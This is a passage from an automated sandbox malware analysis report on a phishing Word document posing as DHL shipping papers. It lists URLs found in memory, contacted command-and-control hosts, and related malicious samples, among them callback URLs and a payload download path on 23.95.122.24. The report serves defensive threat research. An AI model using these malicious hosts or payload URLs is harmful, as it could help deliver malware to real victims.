          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.nevomo.group
          213.186.33.5
          truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          www.scott-re.online/nnmd/true
          • Avira URL Cloud: malware
          low

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://search.chol.com/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
            high
            http://www.mercadolivre.com.br/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.merlin.com.pl/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://search.ebay.de/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
              high
              http://www.mtv.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                high
                http://www.rambler.ru/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                  high
                  http://www.nifty.com/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                    high
                    http://www.dailymail.co.uk/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www3.fnac.com/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                      high
                      https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 0000000D.00000000.2119554654.00000000042CB000.00000004.00000001.sdmpfalse
                        high
                        http://buscar.ya.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                          high
                          http://search.yahoo.com/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                            high
                            http://www.sogou.com/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                              high
                              http://asp.usatoday.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                high
                                http://fr.search.yahoo.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                  high
                                  http://rover.ebay.comexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                    high
                                    http://in.search.yahoo.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                      high
                                      http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://search.ebay.in/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://%s.comexplorer.exe, 0000000D.00000000.2134641767.000000000A330000.00000008.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          low
                                          http://msk.afisha.ru/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://www.msn.com/?ocid=iehpsexplorer.exe, 0000000D.00000000.2119187998.0000000004226000.00000004.00000001.sdmpfalse
                                              high
                                              http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://search.rediff.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                high
                                                http://www.windows.com/pctv.explorer.exe, 0000000D.00000000.2118173395.0000000003C40000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.ya.com/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
                                                    http://www.etmall.com.tw/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://it.search.dada.net/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://search.naver.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://www.google.ru/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://search.hanafos.com/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • 0%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.abril.com.br/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://search.daum.net/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          high
                                                          http://search.naver.com/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            high
                                                            http://search.msn.co.jp/results.aspx?q=explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.clarin.com/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              high
                                                              http://buscar.ozu.es/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • 0%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://kr.search.yahoo.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://search.about.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://busca.igbusca.com.br/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 0000000D.00000000.2130294878.0000000008313000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://www.ask.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        high
                                                                        http://www.priceminister.com/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://www.cjmall.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://search.centrum.cz/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://suche.t-online.de/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://www.google.it/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://search.auction.co.kr/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.ceneo.pl/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://www.amazon.de/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 0000000D.00000002.2369452220.0000000000260000.00000004.00000020.sdmpfalse
                                                                                        high
                                                                                        http://sads.myspace.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://busca.buscape.com.br/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.pchome.com.tw/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://browse.guardian.co.uk/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://google.pchome.com.tw/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://www.rambler.ru/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://uk.search.yahoo.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://espanol.search.yahoo.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://www.ozu.es/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://search.sify.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://openimage.interpark.com/interpark.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://search.yahoo.co.jp/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://search.ebay.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://www.gmarket.co.kr/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://search.nifty.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://searchresults.news.com.au/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://www.google.si/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.google.cz/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://www.soso.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.univision.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://search.ebay.it/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.asharqalawsat.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://busca.orange.es/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://cnweb.search.live.com/results.aspx?q=explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://auto.search.msn.com/response.asp?MT=explorer.exe, 0000000D.00000000.2134641767.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://search.yahoo.co.jpexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://www.target.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://buscador.terra.es/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://search.orange.co.uk/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://www.iask.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://www.tesco.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://cgi.search.biglobe.ne.jp/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://search.seznam.cz/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://suche.freenet.de/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://search.interpark.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://search.ipop.co.kr/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://investor.msn.com/explorer.exe, 0000000D.00000000.2118173395.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://search.espn.go.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://www.myspace.com/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://search.centrum.cz/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://p.zhongsou.com/favicon.icoexplorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://service2.bfast.com/explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://www.%s.comPAexplorer.exe, 0000000D.00000000.2114059517.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              low

                                                                                                                                              Contacted IPs

                                                                                                                                              • No. of IPs < 25%
                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                              • 75% < No. of IPs

                                                                                                                                              Public

                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                              213.186.33.5
                                                                                                                                              www.nevomo.groupFrance
                                                                                                                                              16276OVHFRtrue
                                                                                                                                              23.95.122.24
                                                                                                                                              unknownUnited States
                                                                                                                                              36352AS-COLOCROSSINGUStrue

                                                                                                                                              General Information

                                                                                                                                              Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                              Analysis ID:383965
                                                                                                                                              Start date:08.04.2021
                                                                                                                                              Start time:13:17:02
                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 10m 34s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:light
                                                                                                                                              Sample file name:DHL Shipping doc & Shipment tracking details.docx
                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                              Number of analysed new started processes analysed:18
                                                                                                                                              Number of new started drivers analysed:1
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                              Number of injected processes analysed:1
                                                                                                                                              Technologies:
                                                                                                                                              • HCA enabled
                                                                                                                                              • EGA enabled
                                                                                                                                              • HDC enabled
                                                                                                                                              • AMSI enabled
                                                                                                                                              Analysis Mode:default
                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                              Detection:MAL
                                                                                                                                              Classification:mal100.troj.expl.evad.winDOCX@9/22@1/2
                                                                                                                                              EGA Information:Failed
                                                                                                                                              HDC Information:
                                                                                                                                              • Successful, ratio: 26.3% (good quality ratio 25%)
                                                                                                                                              • Quality average: 71.3%
                                                                                                                                              • Quality standard deviation: 29.1%
                                                                                                                                              HCA Information:
                                                                                                                                              • Successful, ratio: 95%
                                                                                                                                              • Number of executed functions: 0
                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Adjust boot time
                                                                                                                                              • Enable AMSI
                                                                                                                                              • Found application associated with file extension: .docx
                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                              • Attach to Office via COM
                                                                                                                                              • Scroll down
                                                                                                                                              • Close Viewer
                                                                                                                                              Warnings:
                                                                                                                                              Show All
                                                                                                                                              • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, conhost.exe
                                                                                                                                              • TCP Packets have been reduced to 100
                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                              Simulations

                                                                                                                                              Behavior and APIs

                                                                                                                                              TimeTypeDescription
                                                                                                                                              13:17:46API Interceptor50x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                              13:17:51API Interceptor30x Sleep call for process: vbc.exe modified
                                                                                                                                              13:18:09API Interceptor119x Sleep call for process: NETSTAT.EXE modified

                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                              IPs

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                              213.186.33.5Calt7BoW2a.exeGet hashmaliciousBrowse
                                                                                                                                              • www.del-tekzen.com/evpn/?kzrxPDG=v3ZDcR7pjvwz1UjDln28kRDl7qvPbzZbdIYAmpXghlqnmfKnmXU7bNFueyL53HtQM86r&Dxoxa=ZRmh28X82b
                                                                                                                                              BL COPY.exeGet hashmaliciousBrowse
                                                                                                                                              • www.virtualgameserver.online/fhg5/?pP=yhsMnPIgKAgSN0C7rwvDRQKlJvS3c/rOZmkKDD7m5ipCRTfv9wdvKbNSQq6f80HhK9RH&SZ=V48Di0dp
                                                                                                                                              Bista_094924,ppdf.exeGet hashmaliciousBrowse
                                                                                                                                              • www.fenuadiscovery.com/sqra/?EBZ=ZTIti4FxbnDxH&YVMp8pfx=9eTDkTWyy1LvbcWHsrMwtg9XDXQm4MjxGnuAfXrpN6dOXNNyfq+SoXeUTDRT2cFthWfH
                                                                                                                                              New Order.xlsxGet hashmaliciousBrowse
                                                                                                                                              • www.del-tekzen.com/evpn/?qDH4D=f8c0xBrPYP1xE&RB=v3ZDcR7sjow31EvPnn28kRDl7qvPbzZbdIAQ6qLhlFqmmumhhHF3NJ9sdUH/825bZaOcAw==
                                                                                                                                              534ucFq00y.exeGet hashmaliciousBrowse
                                                                                                                                              • www.dentiste-rosendael.com/cyna/?1bF=0wNfzcvtTLbyTsFLpaYCZGKXT18a9oHn1zO7VtfN//Ho3ZumP714MnomXIWndNeW/5Bz&8p=XjilpT
                                                                                                                                              AVRJERqIh4.exeGet hashmaliciousBrowse
                                                                                                                                              • www.del-tekzen.com/evpn/?FPWh=CdQDm&CX94E=v3ZDcR7pjvwz1UjDln28kRDl7qvPbzZbdIYAmpXghlqnmfKnmXU7bNFueyL53HtQM86r
                                                                                                                                              bank details.exeGet hashmaliciousBrowse
                                                                                                                                              • www.mes-produits-frais.com/n30n/?ofl4i=rwLv+H9X8x37/58qpLrfST289Q33IzEUoaVwkxfg51+Avi746P7Wrqy04kgzsNNpeaaDjOFhxw==&1bj=3fb4MJahNHJTdZ
                                                                                                                                              FYI AWB Shipping documents 7765877546 PDF.exeGet hashmaliciousBrowse
                                                                                                                                              • www.workgar.com/b8k8/?U4zx=Mj_P3FUxqTbPUBh0&uVg0=efy/CgdJP5vbH5TIjeBVc6kgapM61W+3+JPD6tMY+y6k9NWdAnw0pDdthMlH3/QTxVcNSuUkig==
                                                                                                                                              Proforma inv.docGet hashmaliciousBrowse
                                                                                                                                              • www.drawingscreen.com/amis/?cf=/m9tfs7psy/QL8RAFvVc7QIdiVqcP4ULW4r7kXDsv/L6p1Mv1rokCr5BJ/YbRIle+x7qbg==&nnLx=TBZx3bgXCBwXGB
                                                                                                                                              #U0646#U0633#U062e#U0629 #U0628#U0646#U0643 #U0633#U0648#U064a#U0641#U062a 0083212 pdf.exeGet hashmaliciousBrowse
                                                                                                                                              • www.meteoannecy.net/n7ak/
                                                                                                                                              dwg.exeGet hashmaliciousBrowse
                                                                                                                                              • www.ancientastronauts.digital/ripw/?GVJ=eEnLuBKHT9fzcG2+RdbQQuZ4lwgRdUvKXW6RMtp8Z2vtfHPPjxhmS0qvsGhGHRv8rfYX&2d=Yl9lnt4hzrh
                                                                                                                                              Additional DHL shipment Delivery Parcel.exeGet hashmaliciousBrowse
                                                                                                                                              • www.underdessous.com/nehc/?Jzu8ZXYx=1WKmeA4sUIsT0NVnqSDBz/otVnAnOZ+pTAVUydYAkzcImvHo1q7b4gKYttlnraGpmrpF&D4f8=fRmXCLc0WnbXAL
                                                                                                                                              PO_210222.exeGet hashmaliciousBrowse
                                                                                                                                              • www.informationnelchamanique.com/dka/?9rYD4D2P=4HtZzIKAOO04Nbq7ChYDUmvNK9qFGjj/E+l1FCmjHEZoiatGj/Rzkf35LDgpsY3kAv6U&4h=vTxdADNprBU8ur
                                                                                                                                              P.O 5282.exeGet hashmaliciousBrowse
                                                                                                                                              • www.claviersenpoitou.ovh/qbeg/?3f0x=hq4St0hniDEdh5A1hCP6yg5Uw6wQZtBkeClthAZB4kGHHLho9iYtQkzO+hgpsE3ThFDLG/hd2w==&Gzux=WB08lHWHB
                                                                                                                                              Hxkidwv66m.exeGet hashmaliciousBrowse
                                                                                                                                              • www.medaye.com/nz8/?ytCXpRW=d77EvwG7/oxjkuuNJtUx1ifNrvp12ahygBcWaI7ocQTc/geaKHfCOjIiL6M9rMdvgUv+&BnY=3f2D_X6XXfQt_Rq0
                                                                                                                                              Shipping Documents CMA CGM COAU7014424560.xlsxGet hashmaliciousBrowse
                                                                                                                                              • www.biomig.net/oean/?SdR=XgOOq6QoKYAMTxb2HPp7s1bJKMN7SvZCJ+ljzv9K68iz1Bzd2f3uX76noL+7DFRgi0fqjQ==&cF=Z4885L6Hr
                                                                                                                                              inquiry 19117030P.xlsxGet hashmaliciousBrowse
                                                                                                                                              • www.egio.digital/eaud/?8paxn=Cp9jocdlCZczMoTMM20vFv0IbEktNH3clJX184rGXLu/hCvDkmg6W0ZY4gTpqIb2jslblg==&jpal0=x8-tbNXpZtBPQx
                                                                                                                                              CREDIT NOTE DEBIT NOTE 30.1.2021.xlsxGet hashmaliciousBrowse
                                                                                                                                              • www.casinocerto.com/eaud/?t2M8bRGP=SyqGIieUJsGJGI6NcFx7ImJJb+0PxKIK5sSUsUukqPXS0WL6I+iBykXhU443H635ii7M3w==&efipT=8pD4qrqpF2f
                                                                                                                                              MV QU SHAN HAI.xlsxGet hashmaliciousBrowse
                                                                                                                                              • www.casinocerto.com/eaud/?lt=ZPm4&TBv=SyqGIieUJsGJGI6NcFx7ImJJb+0PxKIK5sSUsUukqPXS0WL6I+iBykXhU443H635ii7M3w==
                                                                                                                                              orden pdf.exeGet hashmaliciousBrowse
                                                                                                                                              • www.meteoannecy.net/n7ak/?QL3=Y6zPC1HmhVQSD93sTKgbkopj8PghKJAFBa45kph3GFqsoki/+nnDqTMjg+eVW+0o8B1zUBl5Ww==&vDKd7=XRiPw2ZpQdf
                                                                                                                                              23.95.122.24dot.dotGet hashmaliciousBrowse
                                                                                                                                              • 23.95.122.24/zyo/vbc.exe

                                                                                                                                              Domains

                                                                                                                                              No context

                                                                                                                                              ASN

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                              OVHFRCWlXbVUJab.exeGet hashmaliciousBrowse
                                                                                                                                              • 149.56.235.225
                                                                                                                                              IMG_102-05_78_6.docGet hashmaliciousBrowse
                                                                                                                                              • 149.56.235.225
                                                                                                                                              Calt7BoW2a.exeGet hashmaliciousBrowse
                                                                                                                                              • 213.186.33.5
                                                                                                                                              8sxgohtHjM.exeGet hashmaliciousBrowse
                                                                                                                                              • 91.121.60.23
                                                                                                                                              C7SRTTLgsn.exeGet hashmaliciousBrowse
                                                                                                                                              • 54.36.27.31
                                                                                                                                              ApuE9QrdQxe7Um6.exeGet hashmaliciousBrowse
                                                                                                                                              • 66.70.204.222
                                                                                                                                              YReGeOs683XKMn4.exeGet hashmaliciousBrowse
                                                                                                                                              • 51.195.53.221
                                                                                                                                              LCSXS44U22.exeGet hashmaliciousBrowse
